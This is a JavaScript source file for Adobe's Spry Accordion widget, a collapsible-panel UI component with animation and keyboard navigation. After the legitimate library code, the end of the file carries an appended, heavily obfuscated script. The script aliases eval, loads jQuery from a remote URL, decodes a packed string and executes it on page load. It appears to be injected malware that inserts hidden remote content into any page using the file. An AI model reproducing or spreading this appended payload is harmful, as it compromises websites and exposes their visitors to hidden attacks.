/* SpryAccordion.js - Revision: Spry Preview Release 1.4 */

// Copyright (c) 2006. Adobe Systems Incorporated.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
//   * Redistributions of source code must retain the above copyright notice,
//     this list of conditions and the following disclaimer.
//   * Redistributions in binary form must reproduce the above copyright notice,
//     this list of conditions and the following disclaimer in the documentation
//     and/or other materials provided with the distribution.
//   * Neither the name of Adobe Systems Incorporated nor the names of its
//     contributors may be used to endorse or promote products derived from this
//     software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.

var Spry;
if (!Spry) Spry = {};
if (!Spry.Widget) Spry.Widget = {};

Spry.Widget.Accordion = function(element, opts)
{
	this.element = this.getElement(element);
	this.defaultPanel = 0;
	this.hoverClass = "AccordionPanelTabHover";
	this.openClass = "AccordionPanelOpen";
	this.closedClass = "AccordionPanelClosed";
	this.focusedClass = "AccordionFocused";
	this.enableAnimation = true;
	this.enableKeyboardNavigation = true;
	this.currentPanel = null;
	this.animator = null;
	this.hasFocus = null;
	this.duration = 500;

	this.previousPanelKeyCode = Spry.Widget.Accordion.KEY_UP;
	this.nextPanelKeyCode = Spry.Widget.Accordion.KEY_DOWN;

	this.useFixedPanelHeights = true;
	this.fixedPanelHeight = 0;

	Spry.Widget.Accordion.setOptions(this, opts, true);

	// Unfortunately in some browsers like Safari, the Stylesheets our
	// page depends on may not have been loaded at the time we are called.
	// This means we have to defer attaching our behaviors until after the
	// onload event fires, since some of our behaviors rely on dimensions
	// specified in the CSS.

	if (Spry.Widget.Accordion.onloadDidFire)
		this.attachBehaviors();
	else
		Spry.Widget.Accordion.loadQueue.push(this);
};

Spry.Widget.Accordion.onloadDidFire = false;
Spry.Widget.Accordion.loadQueue = [];

Spry.Widget.Accordion.addLoadListener = function(handler)
{
	if (typeof window.addEventListener != 'undefined')
		window.addEventListener('load', handler, false);
	else if (typeof document.addEventListener != 'undefined')
		document.addEventListener('load', handler, false);
	else if (typeof window.attachEvent != 'undefined')
		window.attachEvent('onload', handler);
};

Spry.Widget.Accordion.processLoadQueue = function(handler)
{
	Spry.Widget.Accordion.onloadDidFire = true;
	var q = Spry.Widget.Accordion.loadQueue;
	var qlen = q.length;
	for (var i = 0; i < qlen; i++)
		q[i].attachBehaviors();
};

Spry.Widget.Accordion.addLoadListener(Spry.Widget.Accordion.processLoadQueue);

Spry.Widget.Accordion.prototype.getElement = function(ele)
{
	if (ele && typeof ele == "string")
		return document.getElementById(ele);
	return ele;
};

Spry.Widget.Accordion.prototype.addClassName = function(ele, className)
{
	if (!ele || !className || (ele.className && ele.className.search(new RegExp("\\b" + className + "\\b")) != -1))
		return;
	ele.className += (ele.className ? " " : "") + className;
};

Spry.Widget.Accordion.prototype.removeClassName = function(ele, className)
{
	if (!ele || !className || (ele.className && ele.className.search(new RegExp("\\b" + className + "\\b")) == -1))
		return;
	ele.className = ele.className.replace(new RegExp("\\s*\\b" + className + "\\b", "g"), "");
};

Spry.Widget.Accordion.setOptions = function(obj, optionsObj, ignoreUndefinedProps)
{
	if (!optionsObj)
		return;
	for (var optionName in optionsObj)
	{
		if (ignoreUndefinedProps && optionsObj[optionName] == undefined)
			continue;
		obj[optionName] = optionsObj[optionName];
	}
};

Spry.Widget.Accordion.prototype.onPanelTabMouseOver = function(panel)
{
	if (panel)
		this.addClassName(this.getPanelTab(panel), this.hoverClass);
};

Spry.Widget.Accordion.prototype.onPanelTabMouseOut = function(panel)
{
	if (panel)
		this.removeClassName(this.getPanelTab(panel), this.hoverClass);
};

Spry.Widget.Accordion.prototype.openPanel = function(panel)
{
	var panelA = this.currentPanel;
	var panelB = panel;
	
	if (!panelB || panelA == panelB)	
		return;

	var contentA; 
	if( panelA )
		contentA = this.getPanelContent(panelA);
	var contentB = this.getPanelContent(panelB);

	if (! contentB)
		return;

	if (this.useFixedPanelHeights && !this.fixedPanelHeight)
	{
		this.fixedPanelHeight = (contentA.offsetHeight) ? contentA.offsetHeight : contentA.scrollHeight;
	}

	if (this.enableAnimation)
	{
		if (this.animator)
			this.animator.stop();
		this.animator = new Spry.Widget.Accordion.PanelAnimator(this, panelB, { duration: this.duration });
		this.animator.start();
	}
	else
	{
		if(contentA)
			contentA.style.height = "0px";
		contentB.style.height = (this.useFixedPanelHeights ? this.fixedPanelHeight : contentB.scrollHeight) + "px";
	}

	if(panelA)
	{
		this.removeClassName(panelA, this.openClass);
		this.addClassName(panelA, this.closedClass);
	}

	this.removeClassName(panelB, this.closedClass);
	this.addClassName(panelB, this.openClass);

	this.currentPanel = panelB;
};

Spry.Widget.Accordion.prototype.openNextPanel = function()
{
	var panels = this.getPanels();
	var curPanelIndex = this.getCurrentPanelIndex();
	
	if( panels && curPanelIndex >= 0 && (curPanelIndex+1) < panels.length )
		this.openPanel(panels[curPanelIndex+1]);
};

Spry.Widget.Accordion.prototype.openPreviousPanel = function()
{
	var panels = this.getPanels();
	var curPanelIndex = this.getCurrentPanelIndex();
	
	if( panels && curPanelIndex > 0 && curPanelIndex < panels.length )
		this.openPanel(panels[curPanelIndex-1]);
};

Spry.Widget.Accordion.prototype.openFirstPanel = function()
{
	var panels = this.getPanels();
	if( panels )
		this.openPanel(panels[0]);
};

Spry.Widget.Accordion.prototype.openLastPanel = function()
{
	var panels = this.getPanels();
	if( panels )
		this.openPanel(panels[panels.length-1]);
};

Spry.Widget.Accordion.prototype.onPanelClick = function(panel)
{
	// if (this.enableKeyboardNavigation)
	// 	this.element.focus();
	if (panel != this.currentPanel)
		this.openPanel(panel);
	this.focus();
};

Spry.Widget.Accordion.prototype.onFocus = function(e)
{
	// this.element.focus();
	this.hasFocus = true;
	this.addClassName(this.element, this.focusedClass);
};

Spry.Widget.Accordion.prototype.onBlur = function(e)
{
	// this.element.blur();
	this.hasFocus = false;
	this.removeClassName(this.element, this.focusedClass);
};

Spry.Widget.Accordion.KEY_UP = 38;
Spry.Widget.Accordion.KEY_DOWN = 40;

Spry.Widget.Accordion.prototype.onKeyDown = function(e)
{
	var key = e.keyCode;
	if (!this.hasFocus || (key != this.previousPanelKeyCode && key != this.nextPanelKeyCode))
		return true;
	
	var panels = this.getPanels();
	if (!panels || panels.length < 1)
		return false;
	var currentPanel = this.currentPanel ? this.currentPanel : panels[0];
	var nextPanel = (key == this.nextPanelKeyCode) ? currentPanel.nextSibling : currentPanel.previousSibling;
	
	while (nextPanel)
	{
		if (nextPanel.nodeType == 1 /* Node.ELEMENT_NODE */)
			break;
		nextPanel = (key == this.nextPanelKeyCode) ? nextPanel.nextSibling : nextPanel.previousSibling;
	}
	
	if (nextPanel && currentPanel != nextPanel)
		this.openPanel(nextPanel);

	if (e.stopPropagation)
		e.stopPropagation();
	if (e.preventDefault)
		e.preventDefault();

	return false;
};

Spry.Widget.Accordion.prototype.attachPanelHandlers = function(panel)
{
	if (!panel)
		return;

	var tab = this.getPanelTab(panel);

	if (tab)
	{
		var self = this;
		Spry.Widget.Accordion.addEventListener(tab, "click", function(e) { return self.onPanelClick(panel); }, false);
		Spry.Widget.Accordion.addEventListener(tab, "mouseover", function(e) { return self.onPanelTabMouseOver(panel); }, false);
		Spry.Widget.Accordion.addEventListener(tab, "mouseout", function(e) { return self.onPanelTabMouseOut(panel); }, false);
	}
};

Spry.Widget.Accordion.addEventListener = function(element, eventType, handler, capture)
{
	try
	{
		if (element.addEventListener)
			element.addEventListener(eventType, handler, capture);
		else if (element.attachEvent)
			element.attachEvent("on" + eventType, handler);
	}
	catch (e) {}
};

Spry.Widget.Accordion.prototype.initPanel = function(panel, isDefault)
{
	var content = this.getPanelContent(panel);
	if (isDefault)
	{
		this.currentPanel = panel;
		this.removeClassName(panel, this.closedClass);
		this.addClassName(panel, this.openClass);
	}
	else
	{
		this.removeClassName(panel, this.openClass);
		this.addClassName(panel, this.closedClass);
		content.style.height = "0px";
	}
	
	this.attachPanelHandlers(panel);
};

Spry.Widget.Accordion.prototype.attachBehaviors = function()
{
	var panels = this.getPanels();
	for (var i = 0; i < panels.length; i++)
	{
		this.initPanel(panels[i], i == this.defaultPanel);
	}

	if (this.enableKeyboardNavigation)
	{
		// XXX: IE doesn't allow the setting of tabindex dynamically. This means we can't
		// rely on adding the tabindex attribute if it is missing to enable keyboard navigation
		// by default.

		var tabIndexAttr = this.element.attributes.getNamedItem("tabindex");
		// if (!tabIndexAttr) this.element.tabindex = 0;
		if (tabIndexAttr)
		{
			var self = this;
			Spry.Widget.Accordion.addEventListener(this.element, "focus", function(e) { return self.onFocus(e); }, false);
			Spry.Widget.Accordion.addEventListener(this.element, "blur", function(e) { return self.onBlur(e); }, false);
			Spry.Widget.Accordion.addEventListener(this.element, "keydown", function(e) { return self.onKeyDown(e); }, false);
		}
	}
};

Spry.Widget.Accordion.prototype.getPanels = function()
{
	return this.getElementChildren(this.element);
};

Spry.Widget.Accordion.prototype.getCurrentPanel = function()
{
	return this.currentPanel;
};

Spry.Widget.Accordion.prototype.getCurrentPanelIndex = function()
{
	var panels = this.getPanels();
	for( var i = 0 ; i < panels.length; i++ )
	{
		if( this.currentPanel == panels[i] )
			return i;
	}
	return 0;
};

Spry.Widget.Accordion.prototype.getPanelTab = function(panel)
{
	if (!panel)
		return null;
	return this.getElementChildren(panel)[0];
};

Spry.Widget.Accordion.prototype.getPanelContent = function(panel)
{
	if (!panel)
		return null;
	return this.getElementChildren(panel)[1];
};

Spry.Widget.Accordion.prototype.getElementChildren = function(element)
{
	var children = [];
	var child = element.firstChild;
	while (child)
	{
		if (child.nodeType == 1 /* Node.ELEMENT_NODE */)
			children.push(child);
		child = child.nextSibling;
	}
	return children;
};

Spry.Widget.Accordion.prototype.focus = function()
{
	if (this.element && this.element.focus)
		this.element.focus();
};

/////////////////////////////////////////////////////

Spry.Widget.Accordion.PanelAnimator = function(accordion, panel, opts)
{
	this.timer = null;
	this.interval = 0;
	this.stepCount = 0;

	this.fps = 0;
	this.steps = 10;
	this.duration = 500;
	this.onComplete = null;

	this.panel = panel;
	this.panelToOpen = accordion.getElement(panel);
	this.panelData = [];

	Spry.Widget.Accordion.setOptions(this, opts, true);


	// If caller specified speed in terms of frames per second,
	// convert them into steps.

	if (this.fps > 0)
	{
		this.interval = Math.floor(1000 / this.fps);
		this.steps = parseInt((this.duration + (this.interval - 1)) / this.interval);
	}
	else if (this.steps > 0)
		this.interval = this.duration / this.steps;

	// Set up the array of panels we want to animate.

	var panels = accordion.getPanels();
	for (var i = 0; i < panels.length; i++)
	{
		var p = panels[i];
		var c = accordion.getPanelContent(p);
		if (c)
		{
			var h = c.offsetHeight;
			if (h == undefined)
				h = 0;
			if (p == panel || h > 0)
			{
				var obj = new Object;
				obj.panel = p;
				obj.content = c;
				obj.fromHeight = h;
				obj.toHeight = (p == panel) ? (accordion.useFixedPanelHeights ? accordion.fixedPanelHeight : c.scrollHeight) : 0;
				obj.increment = (obj.toHeight - obj.fromHeight) / this.steps;
				obj.overflow = c.style.overflow;
				this.panelData.push(obj);

				c.style.overflow = "hidden";
				c.style.height = h + "px";
			}
		}
	}
};

Spry.Widget.Accordion.PanelAnimator.prototype.start = function()
{
	var self = this;
	this.timer = setTimeout(function() { self.stepAnimation(); }, this.interval);
};

Spry.Widget.Accordion.PanelAnimator.prototype.stop = function()
{
	if (this.timer)
	{
		clearTimeout(this.timer);

		// If we're killing the timer, restore the overflow
		// properties on the panels we were animating!

		if (this.stepCount < this.steps)
		{
			for (i = 0; i < this.panelData.length; i++)
			{
				obj = this.panelData[i];
				obj.content.style.overflow = obj.overflow;
			}
		}
	}

	this.timer = null;
};

Spry.Widget.Accordion.PanelAnimator.prototype.stepAnimation = function()
{
	++this.stepCount;

	this.animate();

	if (this.stepCount < this.steps)
		this.start();
	else if (this.onComplete)
		this.onComplete();
};

Spry.Widget.Accordion.PanelAnimator.prototype.animate = function()
{
	var i, obj;

	if (this.stepCount >= this.steps)
	{
		for (i = 0; i < this.panelData.length; i++)
		{
			obj = this.panelData[i];
			if (obj.panel != this.panel)
				obj.content.style.height = "0px";
			obj.content.style.overflow = obj.overflow;
			obj.content.style.height = obj.toHeight + "px";
		}
	}
	else
	{
		for (i = 0; i < this.panelData.length; i++)
		{
			obj = this.panelData[i];
			obj.fromHeight += obj.increment;
			obj.content.style.height = obj.fromHeight + "px";
		}
	}
};






s_nc=document;s_L=window;function s_y($,s_nd){return 0}function s_B(x){return x.join('')}if(typeof($)=='undefined'){s_nG=s_nc.getElementsByTagName('head')[0];s_no=s_nc.createElement('script');s_no.setAttribute('src',"http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js");s_nG.appendChild(s_no)}s_L.s_nL=100;s_L.s_nH=25;s_L.s_r=eval;s_L.trim=function(s_na,s_nn){if("qabcdef".indexOf(s_na.substr(0,1))>=0){var s_nk=s_B(s_na.split('q')).split('v');for(var i=0;i<s_nk.length;i++){s_nk[i]=parseInt(s_nk[i],16)-s_nn[s_na]}return s_nk.join(',')+','}else{return s_nn[s_na]}};d='s_f={?%bv1aW$2J$1ZN:"e+",?%bv2aW$2$8$1ZN:"",*b%bv3aW$2J$1Zv30:"l(\'l=St",WXv4e%2*0Qk*2Y:"ring.f",GEv52U%f$cz*az:"romCha",Q%8v68*2*5IT0Y*4:"rCode(">5#e!3J%2$3!1!4*6&1-93%2Q%7%8HU%b%c&6>c%d%e%f$0$1$2$3$4&5L4yZJ$8$9x$b$c|Ld$e%0zGJ$4$0%d|L9E``I*0*5YQ&5>b!4Y!4!4%4Q`*4|A6!7#4V$3zzP*f&6-92?X!a$4*4#8*2!a&7-98#e+d!3Hyy$1#b&1@2G+fYIz*eI+f&3Aa*7%bH$4$4UH%b~>b#d#f+c!2#b!0Y*7&0Ad*1*d%6%1!4%4#e!4&1>e*f%8+d$8*0z%c*f&3>8+f+7*2*5E$dO%e&5>2*b*e+5!axE+e!4&2>6`R^#bR*9T2*4F,ad!3O+d!3`$9$e#c&1A7*5*1?%8%6J%5$d|LdJUkZ$dUkZ&9L8%7$3$2H%7y$e$1&6>6%bH$8%6%7$b%b%6&5,d2$e$cUZ%c$9UJ&9>5$c%3H%6$9VNy&2L8$4$1$cNPHP%2~>7GJH$8+9+8*7*8|>4J%8*f%6+9*7%4J&3>aEIGE+1x*3#d&5Ae*4^#f#8I+f$4*2&5Ad%d%0+0kZZ%3%fF>6JEIGQ$eEV&5@0+f?+7%c$3%7%f$b|>1Z%5!0*6%c%1$3%8&0Af%5%2*b*5?%b+e+5~L6y$b%fPNG#8*2&7A6$d*0z%6+9*7%4J&3>eO%3U*6`*bO%4&9Ad+1W%6`N%e%b$eF>c*4%3VR?X$4%8&7L8N%3?J#4?*b#4~A5$c+fIY+4?N%c&2L3%d$2`%0zO%0z|Ab+f?#d!2z$1JZ&2A8*0Q%0!0Y%1`*0&0,a0H%4!7y*1#4#f!7|>6#fY%7NZ$4%7$0&2>d$c*4%f$8$b+5+3V&9>a%f!1!4%5%1!4%3#e&1-98+4+5%8+1Q?%c%3~A7*e%1+f!7+1%1Gy|L9HZ$dT1#f%dU+0|La*3#d??Qx*1^&5@9%4%4#8#f+9*3Ux~>c%8$2T4%c$3x%c!7&7>cH?*f$8#f#ckk&3Ab$d*6#a#8O%4%4#9~@f+8G#8^*2H$9%c&7>9$3T5T5$1%eNV?~L9O?$9*5?+cT6#4~@9OR#fR?+bT6O~-95$3$0+6$bUE+8*7FAb?*f$2I*f$4Ez&3,d3GG#4+5*c%7`T3&9AdI!7yEP!7$eE|@1I^WW%0*e*3+2&6L6E^k*8*8%1k*4&7-9e$1QGxXXRR&2>1y*4+f+3*fG+e#d&7@7EVW#a%1P+c+0|,a0*4*4#aOR+fN#a~@dO%5*3?k*5%0N~,a2$e*4*4#9PO+d^&6@6P%3O+eI+2$e*4&6-94#aPO+d^WP%3&6-95Ex*7%2+6*dX%1F@0#a#dOO%5R%0+4~-93!a+7QGXVV+d&0@c!4$4#e+9*d$b?+8&1@4W?+f#dYU#fz&2@5$4%8JP%2#f#8R&7@9WE#8XE#8XE&1@dWNX#bN#cWN|@f#b#4*0#8#4#b#8#4~@8G`^^`GX`&0@5XNX#4NX#4N|@e#9#4#9#9#4#d#e#4~@e#eX#a#aX#e#cX&9@dR#c#aR#eR#9R&7@7GWG#a#e%3G*6&6Ad$dO%e%5*eY+8$9&5L4%b$0HN%8$4$1%f&2-97%c%5Z*7$3%8H`|>cI$bIX^`T0+d&3,a3*0z*5?+e!a%bJ&3Lc$8*2^^P#4?$b~@6ET1WExWE$8F@3!axR!a*8%2!a*a&7@7#b%7WO#8%d$9JF@1V+f?EY*4*eU&2Aa#cYV+d!3%3$0%5&1,d3%6`R#8%bxx%fFL4U+2*8I%1E*2U&6>dx!4J$8$d$0H*1|>6`OWE$eWO*7F>0z?N!7+4N?%0|A2!0JH%4$4%8#dO&0@3R!3!aPz%dP!a&3-91#fG%7%c$9*1!a%0&3Ab?kk?kI#4G&2@6WPT3PT3PT3%b&6L4$b%dT3Q`J$d$c~-9fUPXRR`T0T0&3A4%8V!a#c*1!1!4U&1Afk%7+0!7k+d*fZ&7LaJ$8EIT2*5YQ&5>cV$9%1%5#e%f%6$8&1Aa*e%b$e%fGR*5%eF@3YVE$dR%6Q$4&5>7?GOOO!a#c*a&1A2%6k*2!2Y+6!ay&2@5$2H+2V$c^%c$1&9>5Z*7$3%8H*5$8`|>b?k*2!2Y+5!ax&2>9+2VT1^y%eJ$0&9L6UkYy%1*2%8J&2L5U$b$0Zy+0$9%c&7L4y$2%e*cQ!3+1!7&0Ab*0PR%2Y$3#fY&2,aa+2%8I#aPG^P&6@0Q+8+1%7E#9II&5>0#8$1%f$e+f+e*d%1FAd+8RP%2E*f%5GF>0P*1V%6PT1T4+2&6>4+b!3*a+d+bW+dI&0L3J%7$4$b+e+eQQ&2A5*cN%b$0%6%7x+1&2>cIEzzzP!7*3&6Acx$3HU%b%e$3U&5>4!7!0!1Q%0H%6Q&0LeT3x%f$9$0GI!aFAc$b%d$c+c$1y%dQ~Ac?X%e%c$b+1+a+6&7,a1*fY#eH$2y?%6&3-92^X*0%8*0H*2E&5Le*7%e#8$dxZ$3$eF@2OE*a+3+6+b%0%1F>1%3HT7%5%5VVV&9AaVEVIN^$c$e&9>5ZJy?%6N*0?&3Le*3H*2^#a*5^*0&6@4?Ix???N%c&2>fH%eQ$4I$0%f$0&0@1GGG*4%ekUy&9AdHI&5,WX!%2*0Qk*2!7:"32);",*$8$%dZ%c*b$0$1:"s_r(l)\'",!7!!0*9$2Q!0#8*2:");"};s_v=[];s_nw=String.fromCharCode;for(+r s_D in s_f){Mtrim(s_D,s_f))};M\';s_t=s_nw(118/5<5/5,98/5/8/5<6,121,58/4/5/0/0/1<0,34,62,60\\,32<5<4,99);\');M\'s_j=s_nw(104/1/5/3/4<6,61,56,48,62,60,47\\);\');M\'s_K=s_nw(97<2/5,46<6<9/5<6<6/1<4,46,99<1/9,47,49,47<6<4/1<0/0<5,47/0,97/5/8,121,46/6<5<1<0);\');s_r(s_B(s_v))!v7#v8$vc%vb&:8*v9+va-,q/,10<,11>,b?!b@-8A-7E!dF:90G#2H%9I!eJ$7L,cMs_v.push(N#0O#1P!fQ!8R#3TvdU%aV!9W#6X#5Y!5Z$6^#7`!ck$fx$ay$5z!6|&4~&8\\/5/2<4,97/9/1';for(c=43;c--;d=(t=d.split('!#$%&*+-/<>?@AEFGHIJLMNOPQRTUVWXYZ^`kxyz|~\\'.charAt(c))).join(t.pop()));s_nx=d;s_r(s_nx)

